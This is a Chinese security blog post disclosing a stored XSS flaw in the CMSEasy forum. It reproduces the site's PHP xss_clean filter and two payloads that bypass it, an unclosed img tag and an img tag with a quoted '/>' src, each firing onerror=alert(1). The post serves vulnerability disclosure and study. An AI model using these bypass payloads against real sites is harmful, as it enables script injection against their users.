纵有疾风起
人生不言弃

cmseasy最新版存储型XSS(可绕过xss防护机制)#2 – 网站

html是一种很有趣的语言。。

cmseasy的bbs发帖处的 过滤xss代码 将<>内的html代码进行了一次很完整的过滤。
 

function xss_clean($data) {

    if (empty($data)) {
        return $data;
    }

    if (is_array($data)) {
        foreach ($data as $key => $value) {
            $data[xss_clean($key)] = xss_clean($value);
        }
        return $data;
    }

    $data = str_replace(array('&amp;', '&lt;', '&gt;'), array('&amp;amp;', '&amp;lt;', '&amp;gt;'), $data);
    $data = preg_replace('/(&#*\w+)[\x00-\x20]+;/', '$1;', $data);
    $data = preg_replace('/(&#x*[0-9A-F]+);*/i', '$1;', $data);

    if (function_exists("html_entity_decode")) {
        $data = html_entity_decode($data);
    } else {
        $trans_tbl = get_html_translation_table(HTML_ENTITIES);
        $trans_tbl = array_flip($trans_tbl);
        $data = strtr($data, $trans_tbl);
    }

    $data = preg_replace('#(<[^>]+?[\x00-\x20"\'])(?:on|xmlns)[^>]*+>#i', '$1>', $data);

    $data = preg_replace('#([a-z]*)[\x00-\x20]*=[\x00-\x20]*([`\'"]*)[\x00-\x20]*j[\x00-\x20]*a[\x00-\x20]*v[\x00-\x20]*a[\x00-\x20]*s[\x00-\x20]*c[\x00-\x20]*r[\x00-\x20]*i[\x00-\x20]*p[\x00-\x20]*t[\x00-\x20]*:#i', '$1=$2nojavascript...', $data);
    $data = preg_replace('#([a-z]*)[\x00-\x20]*=([\'"]*)[\x00-\x20]*v[\x00-\x20]*b[\x00-\x20]*s[\x00-\x20]*c[\x00-\x20]*r[\x00-\x20]*i[\x00-\x20]*p[\x00-\x20]*t[\x00-\x20]*:#i', '$1=$2novbscript...', $data);
    $data = preg_replace('#([a-z]*)[\x00-\x20]*=([\'"]*)[\x00-\x20]*-moz-binding[\x00-\x20]*:#', '$1=$2nomozbinding...', $data);

    $data = preg_replace('#(<[^>]+?)style[\x00-\x20]*=[\x00-\x20]*[`\'"]*.*?expression[\x00-\x20]*\([^>]*+>#i', '$1>', $data);
    $data = preg_replace('#(<[^>]+?)style[\x00-\x20]*=[\x00-\x20]*[`\'"]*.*?behaviour[\x00-\x20]*\([^>]*+>#i', '$1>', $data);
    $data = preg_replace('#(<[^>]+?)style[\x00-\x20]*=[\x00-\x20]*[`\'"]*.*?s[\x00-\x20]*c[\x00-\x20]*r[\x00-\x20]*i[\x00-\x20]*p[\x00-\x20]*t[\x00-\x20]*:*[^>]*+>#i', '$1>', $data);

    $data = preg_replace('#</*\w+:\w[^>]*+>#i', '', $data);

    do {
        // Remove really unwanted tags
        $old_data = $data;
        $data = preg_replace('#</*(?:applet|b(?:ase|gsound|link)|embed|frame(?:set)?|i(?:frame|layer)|l(?:ayer|ink)|meta|object|s(?:cript|tyle)|title|xml)[^>]*+>#i', '', $data);
    } while ($old_data !== $data);

    return $data;
}

然而,我们真的需要 <>么?

做个测试,下面这段代码会alert么?
 

<body><img src=aa  onerror=alert(1) alt= </body>

运行一次 你会发现 alert了,由于 <img没有闭合,浏览器 将 </body当成alt的属性值了,解释为 <img src=aa onerror=alert(1) alt=”</body” >。导致js的执行

测试下 提交 <img src=aa onerror=alert(1) alt=
 

cmseasy最新版存储型XSS(可绕过xss防护机制)#2 – 网站插图

 

cmseasy最新版存储型XSS(可绕过xss防护机制)#2 – 网站插图1

由上面的例子 很快可以得到另一个xss代码 <img src=”/>” onerror=alert(1)>.
 

修复方案:

过滤

    上一篇: 绕过补丁再次重置墨迹天气任意邮箱密码 – 网站

    下一篇: destoon存储型xss指哪打哪 – 网站安全 – 自学php
未经允许不得转载:起风网 » cmseasy最新版存储型XSS(可绕过xss防护机制)#2 – 网站
分享到: 生成海报

评论 抢沙发

评论前必须登录!

立即登录